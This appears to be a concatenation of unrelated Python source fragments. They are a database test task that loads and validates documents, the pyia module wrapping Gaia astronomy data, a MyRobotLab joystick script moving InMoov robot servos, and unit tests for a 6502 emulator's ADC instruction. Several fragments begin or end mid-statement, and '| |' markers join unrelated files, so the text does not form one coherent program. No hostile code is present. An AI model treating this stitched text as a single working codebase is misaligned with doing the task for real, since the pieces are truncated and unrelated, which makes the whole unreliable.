self.test_log.info("DGM %s%% achieved for '%s'"
% (dgm_value, bucket.name))
def call(self):
self.test_log.info("Starting DGM doc loading task")
self.start_task()
for bucket in self.buckets:
self._load_bucket_into_dgm(bucket)
self.complete_task()
self.test_log.info("Done loading docs for DGM")
class ValidateDocumentsTask(GenericLoadingTask):
def __init__(self, cluster, bucket, client, generator, op_type, exp,
flag=0, proxy_client=None, batch_size=1, pause_secs=1,
timeout_secs=30, compression=True):
super(ValidateDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
pause_secs=pause_secs, timeout_secs=timeout_secs,
compression=compression)
self.thread_name = "ValidateDocumentsTask-{}_{}_{}_{}".format(
bucket.name, generator._doc_gen.start, generator._doc_gen.end,
op_type)
self.generator = generator
self.op_type = op_type
self.exp = exp
self.flag = flag
self.failed_item_table = TableView(self.test_log.info)
self.failed_item_table.set_headers(["READ doc_Id", "Exception"])
self.missing_keys = []
self.wrong_values = []
self.failed_reads = dict()
if proxy_client:
self.log.debug("Changing client to proxy %s:%s..."
% (proxy_client.host, proxy_client.port))
self.client = proxy_client
def has_next(self):
return self.generator.has_next()
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
key_value = doc_gen.next_batch()
if self.op_type == 'create':
self._process_values_for_create(key_value)
elif self.op_type == 'update':
self._process_values_for_update(key_value)
elif self.op_type == 'delete':
pass
else:
self.set_exception(Exception("Bad operation type: %s"
% self.op_type))
result_map, self.failed_reads = self.batch_read(key_value.keys())
for key, value in self.failed_reads.items():
if DurableExceptions.KeyNotFoundException not in str(self.failed_reads[key]["error"]):
self.failed_item_table.add_row([key, value['error']])
missing_keys, wrong_values = self.validate_key_val(result_map,
key_value)
if self.op_type == 'delete':
not_missing = []
if missing_keys.__len__() == key_value.keys().__len__():
for key in key_value.keys():
if key not in missing_keys:
not_missing.append(key)
if not_missing:
self.set_exception(Exception("Keys were not deleted. "
"Keys not deleted: {}"
.format(','.join(not_missing))))
else:
if missing_keys:
self.missing_keys.extend(missing_keys)
if | |
<filename>pyia/data.py<gh_stars>0
# coding: utf-8
""" Data structures. """
# Standard library
import pathlib
# Third-party
import astropy.coordinates as coord
from astropy.table import Table, Column
from astropy.time import Time
import astropy.units as u
import numpy as np
from .extinction import get_ext
from .ruwetools import U0Interpolator
__all__ = ["GaiaData"]
# This is from reading the data model
gaia_unit_map = {
"ra": u.degree,
"dec": u.degree,
"parallax": u.milliarcsecond,
"pmra": u.milliarcsecond / u.year,
"pmdec": u.milliarcsecond / u.year,
"radial_velocity": u.km / u.s,
"ra_error": u.milliarcsecond,
"dec_error": u.milliarcsecond,
"parallax_error": u.milliarcsecond,
"pmra_error": u.milliarcsecond / u.year,
"pmdec_error": u.milliarcsecond / u.year,
"radial_velocity_error": u.km / u.s,
"astrometric_excess_noise": u.mas,
"astrometric_weight_al": 1 / u.mas ** 2,
"astrometric_pseudo_colour": 1 / u.micrometer,
"astrometric_pseudo_colour_error": 1 / u.micrometer,
"astrometric_sigma5d_max": u.mas,
"phot_g_mean_flux": u.photon / u.s,
"phot_g_mean_flux_error": u.photon / u.s,
"phot_g_mean_mag": u.mag,
"phot_bp_mean_flux": u.photon / u.s,
"phot_bp_mean_flux_error": u.photon / u.s,
"phot_bp_mean_mag": u.mag,
"phot_rp_mean_flux": u.photon / u.s,
"phot_rp_mean_flux_error": u.photon / u.s,
"phot_rp_mean_mag": u.mag,
"bp_rp": u.mag,
"bp_g": u.mag,
"g_rp": u.mag,
"rv_template_teff": u.K,
"l": u.degree,
"b": u.degree,
"ecl_lon": u.degree,
"ecl_lat": u.degree,
"teff_val": u.K,
"teff_percentile_lower": u.K,
"teff_percentile_upper": u.K,
"a_g_val": u.mag,
"a_g_percentile_lower": u.mag,
"a_g_percentile_upper": u.mag,
"e_bp_min_rp_val": u.mag,
"e_bp_min_rp_percentile_lower": u.mag,
"e_bp_min_rp_percentile_upper": u.mag,
"radius_val": u.Rsun,
"radius_percentile_lower": u.Rsun,
"radius_percentile_upper": u.Rsun,
"lum_val": u.Lsun,
"lum_percentile_lower": u.Lsun,
"lum_percentile_upper": u.Lsun,
"ref_epoch": u.year,
}
REF_EPOCH = {"DR2": Time(2015.5, format="jyear"), "EDR3": Time(2016.0, format="jyear")}
LATEST_RELEASE = "EDR3"
class GaiaData:
"""Class for loading and interacting with data from the Gaia mission. This
should work with data from any data release, i.e., DR1 gaia_source or TGAS,
or DR2 gaia_source, or EDR3 gaia_source.
Parameters
----------
data : `astropy.table.Table`, `pandas.DataFrame`, dict_like, str
This must be pre-loaded data as any of the types listed above, or a
string filename containing a table that is readable by
`astropy.table.Table.read`.
"""
def __init__(self, data, **kwargs):
if not isinstance(data, Table):
if isinstance(data, (str, pathlib.Path)):
data = Table.read(data, **kwargs)
else:
# the dict-like object might have Quantity's, so we want to
# preserve any units
data = Table(data, **kwargs)
# HACK: make sure table isn't masked, until astropy supports masked
# quantities
if data.masked:
cols = []
for c in data.colnames:
col = data[c]
col.mask = None
cols.append(Column(col))
data = Table(cols, copy=False)
# Create a copy of the default unit map
self.units = gaia_unit_map.copy()
# Store the source table
self.data = data
# Update the unit map with the table units
self._invalid_units = dict()
for c in data.colnames:
if data[c].unit is not None:
try:
self.units[c] = u.Unit(str(data[c].unit))
except ValueError:
self._invalid_units[c] = data[c].unit
# HACK: hard coded
self._has_rv = (
"radial_velocity" in self.data.colnames
or "dr2_radial_velocity" in self.data.colnames
)
# For caching later
self._cache = dict()
@classmethod
def from_query(cls, query_str, login_info=None, verbose=True):
"""
Run the specified query and return a `GaiaData` instance with the
returned data.
This is meant only to be used for quick queries to the main Gaia science
archive. For longer queries and more customized usage, use TAP access to
any of the Gaia mirrors with, e.g., astroquery or pyvo.
This requires ``astroquery`` to be installed.
Parameters
----------
query_str : str
The string ADQL query to execute.
login_info : dict, optional
Username and password for the Gaia science archive as keys "user"
and "password". If not specified, will use anonymous access, subject
to the query limits.
Returns
-------
gaiadata : `GaiaData`
An instance of this object.
"""
try:
from astroquery.gaia import Gaia
except ImportError:
raise ImportError(
"Failed to import astroquery. To use the "
"from_query() classmethod, you must first"
" install astroquery, e.g., with pip: "
"\n\tpip install astroquery"
)
if login_info is not None:
Gaia.login(**login_info)
job = Gaia.launch_job_async(query_str, verbose=verbose)
tbl = job.get_results()
return cls(tbl)
@classmethod
def from_source_id(cls, source_id, source_id_dr=None, data_dr=None, **kwargs):
"""Retrieve data from a DR for a given Gaia source_id in a DR.
Useful if you have, e.g., a DR2 source_id and want EDR3 data.
Parameters
----------
source_id : int
The Gaia source_id
source_id_dr : str, optional
The data release slug (e.g., 'dr2' or 'edr3') for the input
source_id. Defaults to the latest data release.
data_dr : str, optional
The data release slug (e.g., 'dr2' or 'edr3') to retrieve data from.
Defaults to the latest data release.
**kwargs
Passed to ``from_query()``
Returns
-------
gaiadata : `GaiaData`
An instance of this object.
"""
join_tables = {
"dr1": {"dr2": "gaiadr2.dr1_neighbourhood"},
"dr2": {"edr3": "gaiaedr3.dr2_neighbourhood"},
}
source_id_prefixes = {"dr1": "dr1", "dr2": "dr2", "edr3": "dr3"}
if source_id_dr is None:
source_id_dr = LATEST_RELEASE.lower()
if data_dr is None:
data_dr = LATEST_RELEASE.lower()
if source_id_dr == data_dr:
query_str = f"""
SELECT * FROM gaia{data_dr}.gaia_source AS gaia
WHERE gaia.source_id = {source_id}
"""
return cls.from_query(query_str, **kwargs)
dr1, dr2 = sorted([source_id_dr, data_dr])
try:
join_table = join_tables[dr1][dr2]
source_id_pref = source_id_prefixes[source_id_dr]
data_pref = source_id_prefixes[data_dr]
except KeyError:
raise KeyError(
f"Failed to find join table for {source_id_dr} " f"to {data_dr}"
)
query_str = f"""
SELECT * FROM gaia{data_dr}.gaia_source AS gaia
JOIN {join_table} AS old_gaia
ON gaia.source_id = old_gaia.{data_pref}_source_id
WHERE old_gaia.{source_id_pref}_source_id = {source_id}
"""
return cls.from_query(query_str, **kwargs)
##########################################################################
# Python internal
#
def __getattr__(self, name):
# to prevent recursion errors:
# nedbatchelder.com/blog/201010/surprising_getattr_recursion.html
if name in ["data", "units"]:
raise AttributeError()
lookup_name = name
if name.startswith("radial_velocity"):
# HACK: this should be more general...
if (
"radial_velocity" not in self.data.colnames
and "dr2_radial_velocity" in self.data.colnames
):
lookup_name = f"dr2_{name}"
coldata = self.data[lookup_name]
if hasattr(coldata, "mask") and coldata.mask is not None:
arr = coldata.filled()
else:
arr = coldata
arr = np.asarray(arr)
if name in self.units:
return arr * self.units[name]
else:
return arr
def __setattr__(self, name, val):
if name in ["data", "units"]:
# needs to be here to catch the first time we enter this func.
super().__setattr__(name, val)
elif name in self.units:
if not hasattr(val, "unit"):
raise ValueError(
'To set data for column "{0}", you must '
"provide a Quantity-like object (with units).".format(name)
)
self.data[name] = val
self.units[name] = val.unit
elif name in self.data.columns:
self.data[name] = val
else:
super().__setattr__(name, val)
def __dir__(self):
return super().__dir__() + [str(k) for k in self.data.columns]
def __getitem__(self, slc):
if isinstance(slc, int):
slc = slice(slc, slc + 1)
elif isinstance(slc, str):
return self.__getattr__(slc)
return self.__class__(self.data[slc])
def __setitem__(self, name, val):
if hasattr(val, "unit"):
self.data[name] = val.value
self.units[name] = val.unit
else:
self.data[name] = val
def __len__(self):
return len(self.data)
def __str__(self):
names = ["ra", "dec", "parallax", "pmra", "pmdec"]
if self._has_rv:
names.append("radial_velocity")
return str(self.data[names])
def __repr__(self):
return "<GaiaData: {0:d} rows>".format(len(self))
##########################################################################
# Computed and convenience quantities
#
@property
def pm(self):
"""2D proper motion. Has shape `(nrows, 2)`"""
_u = self.pmra.unit
return np.vstack((self.pmra.value, self.pmdec.to(_u).value)).T * _u
@u.quantity_input(min_parallax=u.mas, equivalencies=u.parallax())
def get_distance(
self, min_parallax=None, parallax_fill_value=np.nan, allow_negative=False
):
"""Compute distance from parallax (by inverting the parallax) using
`~astropy.coordinates.Distance`.
Parameters
----------
min_parallax : `~astropy.units.Quantity` (optional)
If `min_parallax` specified, the parallaxes are clipped to this
values (and it is also used to replace NaNs).
allow_negative : bool (optional)
This is passed through to `~astropy.coordinates.Distance`.
Returns
-------
dist : `~astropy.coordinates.Distance`
A ``Distance`` object with the data.
"""
plx = self.parallax.copy()
if np.isnan(parallax_fill_value):
parallax_fill_value = parallax_fill_value * u.mas
if min_parallax is not None:
clipped = plx < min_parallax
clipped |= ~np.isfinite(plx)
plx[clipped] = parallax_fill_value
return coord.Distance(parallax=plx, allow_negative=allow_negative)
@property
def distance(self):
"""Assumes 1/parallax. Has shape `(nrows,)`.
This attribute will raise an error when there are negative or zero
parallax values. For more flexible retrieval of distance values and
auto-filling bad values, use the .get_distance() method."""
return self.get_distance()
def get_radial_velocity(self, fill_value=None):
"""Return radial velocity but with invalid values filled with the
specified fill value.
Parameters
----------
fill_value : `~astropy.units.Quantity` (optional)
If not ``None``, fill any invalid values with the specified value.
"""
rv = self.radial_velocity.copy()
rv[~np.isfinite(rv)] = fill_value
return rv
@property
def distmod(self):
"""Distance modulus, m-M = 5 * log10(dist / (10 pc))"""
return self.distance.distmod
@property
def vtan(self):
"""
Tangential velocity computed using the proper motion and inverse
parallax as the distance. Has shape `(nrows, 2)`
"""
d = self.distance
vra = (self.pmra * d).to(u.km / u.s, u.dimensionless_angles()).value
vdec = (self.pmdec * d).to(u.km / u.s, u.dimensionless_angles()).value
return np.vstack((vra, vdec)).T * u.km / u.s
def get_cov(self, RAM_threshold=1 * u.gigabyte, units=None):
"""
The Gaia data tables contain correlation coefficients and standard
deviations for (ra, dec, parallax, pm_ra, pm_dec), but for most analyses
we need covariance matrices. This converts the data provided by Gaia
into covariance matrices.
| |
if voice == 0:
i01.mouth.speak("loading joystick Script")
elif voice == 1:
i01.mouth.speak("laddar joystick Script")
serial = Runtime.createAndStart("serial","Serial")
serial.connect('COM7')
joystick = Runtime.start("joystick","Joystick")
joystick.setController(14)
listener3 = MRLListener('publishJoystickInput', 'python', 'onJoystick1Input')
joystick.addListener(listener3)
Yval1 = 90
Yval2 = 90
Xval1 = 90
Xval2 = 90
lstest = 0
lrtest = 0
lbtest = 0
lwtest = 0
rstest = 0
rrtest = 0
rbtest = 0
rwtest = 0
def onJoystick1Input(data):
# if (data.id== "Esc" and data.value == 1.0):
# if drive == 0:
# drivemode()
# elif drive == 1:
# gesturemode()
# elif drive == 2:
# autonomousmode()
if (data.id== "z"):
if handshake == 1:
global test
test = data.value * 180
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.thumb.moveTo(int(float(test2)))
i01.rightHand.index.moveTo(int(float(test2)))
i01.rightHand.majeure.moveTo(int(float(test2)))
i01.rightHand.ringFinger.moveTo(int(float(test2)))
i01.rightHand.pinky.moveTo(int(float(test2)))
if arms == 0:
global XboxZ
XboxZ = ((data.value + 1) * 127)
XboxZ = ("%.0f"%XboxZ)
if (arms == 1) or (arms == 2):
global test
test = data.value * 180
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.thumb.moveTo(int(float(test2)))
i01.rightHand.index.moveTo(int(float(test2)))
i01.rightHand.majeure.moveTo(int(float(test2)))
i01.rightHand.ringFinger.moveTo(int(float(test2)))
i01.rightHand.pinky.moveTo(int(float(test2)))
i01.leftHand.thumb.moveTo(int(float(test2)))
i01.leftHand.index.moveTo(int(float(test2)))
i01.leftHand.majeure.moveTo(int(float(test2)))
i01.leftHand.ringFinger.moveTo(int(float(test2)))
i01.leftHand.pinky.moveTo(int(float(test2)))
if leftarm == 1 or leftarm == 2:
global test
test = 180 - ((1 + data.value ) * 180)
test2 = ("%.0f"%test)
# print(test2)
i01.leftHand.thumb.moveTo(int(float(test2)))
i01.leftHand.index.moveTo(int(float(test2)))
i01.leftHand.majeure.moveTo(int(float(test2)))
i01.leftHand.ringFinger.moveTo(int(float(test2)))
i01.leftHand.pinky.moveTo(int(float(test2)))
if rightarm == 1 or rightarm == 2:
global test
test = data.value * 180
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.thumb.moveTo(int(float(test2)))
i01.rightHand.index.moveTo(int(float(test2)))
i01.rightHand.majeure.moveTo(int(float(test2)))
i01.rightHand.ringFinger.moveTo(int(float(test2)))
i01.rightHand.pinky.moveTo(int(float(test2)))
if (data.id== "rx"):
if handshake == 1:
global test
test = 180 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightHand.wrist.moveTo(int(float(test2)))
global test
test = (data.value + 1) * 90
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.rotate.moveTo(int(float(test2)))
if arms == 0:
global XboxRX
XboxRX = (data.value + 1) * 127.5
XboxRX = ("%.0f"%XboxRX)
if arms == 1:
global test
test = (data.value + 1) * 90
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.rotate.moveTo(int(float(test2)))
i01.leftArm.rotate.moveTo(int(float(test2)))
if arms == 2:
if data.value > 0.2:
if data.value > rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
test = (i01.leftArm.rotate.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.rotate.moveTo(int(float(test2)))
i01.leftArm.rotate.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rrtest
rrtest = 0
elif data.value < -0.2:
if data.value < rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
test = (i01.leftArm.rotate.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.rotate.moveTo(int(float(test2)))
if rightarm == 1:
global test
test = (data.value + 1) * 90
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.rotate.moveTo(int(float(test2)))
if leftarm == 1:
global test
test = 180 - ((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.leftHand.wrist.moveTo(int(float(test2)))
elif leftarm == 2:
if data.value > 0.2:
if data.value > lwtest:
global lwtest
lwtest = data.value
global test
test = (i01.leftHand.wrist.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftHand.wrist.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global lwtest
lwtest = 0
elif data.value < -0.2:
if data.value < lwtest:
global lwtest
lwtest = data.value
global test
test = (i01.leftHand.wrist.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftHand.wrist.moveTo(int(float(test2)))
elif rightarm == 2:
if data.value > 0.2:
if data.value > rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rrtest
rrtest = 0
elif data.value < -0.2:
if data.value < rrtest:
global rrtest
rrtest = data.value
global test
test = (i01.rightArm.rotate.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.rotate.moveTo(int(float(test2)))
if (data.id== "ry"):
if handshake == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.bicep.moveTo(int(float(test2)))
i01.rightArm.shoulder.moveTo(int(float(test2)))
if arms == 0:
global XboxRY
XboxRY = 255 - ((data.value + 1) * 127.5)
XboxRY = ("%.0f"%XboxRY)
if arms == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.shoulder.moveTo(int(float(test2)))
i01.leftArm.shoulder.moveTo(int(float(test2)))
if arms == 2:
if data.value > 0.2:
if data.value > rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
test = (i01.leftArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rstest
rstest = 0
elif data.value < -0.2:
if data.value < rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
test = (i01.leftArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
if rightarm == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.shoulder.moveTo(int(float(test2)))
if leftarm == 1:
global test
test = 120 - ((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif leftarm == 2:
if data.value > 0.2:
if data.value > lbtest:
global lbtest
lbtest = data.value
global test
test = (i01.leftArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global lbtest
lbtest = 0
elif data.value < -0.2:
if data.value < lbtest:
global lbtest
lbtest = data.value
global test
test = (i01.leftArm.bicep.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif rightarm == 2:
if data.value > 0.2:
if data.value > rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rstest
rstest = 0
elif data.value < -0.2:
if data.value < rstest:
global rstest
rstest = data.value
global test
test = (i01.rightArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.shoulder.moveTo(int(float(test2)))
if (data.id== "y"):
if arms == 0 or handshake == 1:
i01.setHeadSpeed(0.9, 0.9)
global Yval1
global Yval2
test = 180 - ((data.value + 1) * 90)
Yval1 = ("%.0f"%test)
if (Yval1 <> Yval2) :
Yval2 = Yval1
# print(Yval2)
i01.head.neck.moveTo(int(float(Yval2)))
i01.head.eyeY.moveTo(int(float(Yval2)))
elif arms == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.bicep.moveTo(int(float(test2)))
i01.leftArm.bicep.moveTo(int(float(test2)))
elif arms == 2:
if data.value > 0.2:
if data.value > rbtest:
global rbtest
rbtest = data.value
global test
test = (i01.rightArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.bicep.moveTo(int(float(test2)))
test = (i01.leftArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rbtest
rbtest = 0
elif data.value < -0.2:
if data.value < rbtest:
global rbtest
rbtest = data.value
global test
test = (i01.rightArm.bicep.getPos() + 1)
test2 = ("%.0f"%test)
i01.rightArm.bicep.moveTo(int(float(test2)))
test = (i01.leftArm.bicep.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.bicep.moveTo(int(float(test2)))
elif leftarm == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif rightarm == 1:
global test
test = 120 -((data.value + 1) * 90)
test2 = ("%.0f"%test)
# print(test2)
i01.rightArm.bicep.moveTo(int(float(test2)))
elif leftarm == 2:
if data.value > 0.2:
if data.value > lstest:
global lstest
lstest = data.value
global test
test = (i01.leftArm.shoulder.getPos() - 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global lstest
lstest = 0
elif data.value < -0.2:
if data.value < lstest:
global lstest
lstest = data.value
global test
test = (i01.leftArm.shoulder.getPos() + 1)
test2 = ("%.0f"%test)
i01.leftArm.shoulder.moveTo(int(float(test2)))
elif rightarm == 2:
if data.value > 0.2:
if data.value > rbtest:
global rbtest
rbtest = data.value
global test
test = (i01.rightArm.bicep.getPos() - 1)
test2 = ("%.0f"%test)
i01.rightArm.bicep.moveTo(int(float(test2)))
elif data.value > -0.1 and data.value < 0.1 :
global rbtest
rbtest = 0
elif data.value < -0.2:
if data.value < rbtest:
global rbtest
rbtest = | |
0x0000, (0x69, 0x00))
# mpu.step()
# self.assertEqual(0x0002, mpu.pc)
# self.assertEqual(0x76, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(0, mpu.p & mpu.CARRY)
# TODO: enable this once code supports invalid BCD operands
# def test_adc_bcd_on_immediate_9c_plus_9d(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p &= ~(mpu.CARRY)
# mpu.a = 0x9c
# # $0000 ADC #$9d
# # $0002 ADC #$9d
# self._write(mpu.memory, 0x0000, (0x69, 0x9d))
# self._write(mpu.memory, 0x0002, (0x69, 0x9d))
# mpu.step()
# self.assertEqual(0x9f, mpu.a)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# mpu.step()
# self.assertEqual(0x0004, mpu.pc)
# self.assertEqual(0x93, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# ADC Absolute, X-Indexed
def test_adc_bcd_off_abs_x_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0x00
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0x00
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_abs_x_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0xFE
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0xFF
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0x01
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0xff
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7f
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0x01
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x80, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x80
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0xff
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7f, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x40
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.x] = 0x40
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x80, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Absolute, Y-Indexed
def test_adc_bcd_off_abs_y_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0x00
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.y = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0x00
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_abs_y_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
mpu.memory[0xC000 + mpu.y] = 0xFE
